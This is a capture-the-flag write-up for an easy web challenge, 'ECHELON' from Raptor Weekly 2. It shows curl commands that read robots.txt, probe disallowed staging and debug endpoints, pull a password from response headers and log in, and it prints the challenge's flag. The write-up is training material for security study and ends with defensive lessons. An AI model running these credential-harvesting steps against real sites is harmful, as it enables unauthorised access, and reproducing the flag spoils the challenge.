Home > Writeups > Raptor Weekly 2 - ECHELON Web 1 - 1.1 ; OPEN CHANNEL

Raptor Weekly 2 - ECHELON Web 1 - 1.1 ; OPEN CHANNEL

Chaining HTML comment enumeration to a disallowed robots.txt entry, pivoting through an exposed staging endpoint to recover an operator username, and extracting the portal password from a JSON debug response behind a custom request header.

Date: May 10, 2026 Category: Web Difficulty: Easy Views: 15
Tags:
web recon ECHELON Raptor-Weekly

1.1 ; OPEN CHANNEL

Challenge Description

The ECHELON portal is live. You have a URL and nothing else. Get in.

URL: https://echelon.two-shoes.org/

Overview

The landing page is a login portal. No credentials are provided. Three leaky surfaces expose the operator username and password through basic web recon: an HTML comment, robots.txt, and a forgotten debug endpoint. The flag appears on the CONFIDENTIAL tier page after a successful login.

Step 1: Read the Page Source

View the HTML source of the landing page. An HTML comment near the top reads:

<!-- staging environment migrated 2026-02-28 ; /staging still active pending decom ; see /robots.txt -->

Two leads: /staging and /robots.txt.

Step 2: Read robots.txt

curl https://echelon.two-shoes.org/robots.txt

User-agent: *
Disallow: /staging/access
Disallow: /api/debug
Disallow: /admin/

Three disallowed paths. /staging/ and /api/debug are the interesting ones. /admin/ returns 404.

Step 3: Enumerate the Staging Endpoint

curl https://echelon.two-shoes.org/staging/access

{
  "env": "staging",
  "status": "active",
  "operator": "analyst.arc",
  "auth": "see /api/debug for credential validation endpoint"
}

The operator username is analyst.arc. The response points to /api/debug for the password.

Step 4: Hit the Debug Endpoint

curl -v https://echelon.two-shoes.org/api/debug

The response body is a generic status message. The credentials are in the response headers:

X-Debug-Auth:   operator=analyst.arc
X-Debug-Secret: Echelon#Node07#2026
X-Debug-Note:   remove before prod ; flagged for decom 2026-04-01

Step 5: Authenticate

curl -c cookies.txt -X POST https://echelon.two-shoes.org/login \
  -d "username=analyst.arc&password=Echelon#Node07#2026" -L

Or login in the UI.

The portal sets a session cookie and redirects to /access. The flag is displayed on that page.

Key Takeaways

robots.txt was designed to instruct web crawlers, not to hide sensitive paths. Listing a path in robots.txt is security through obscurity at best and an active signpost to attackers at worst. Debug and staging endpoints that expose credentials in response headers are a direct credential leak regardless of whether they are intended to be temporary. Credentials in HTTP headers appear in logs, proxies, browser history, and any monitoring tool in the path.

Flag

ECHELON{c0ldw4r_never_ended}

< Back to All Writeups

ma1ice@ctf:~/writeups$ cat raptor-weekly-2-echelon-web-1-1-1-open-channel.md | wc -l

Published 2026-05-10 • Web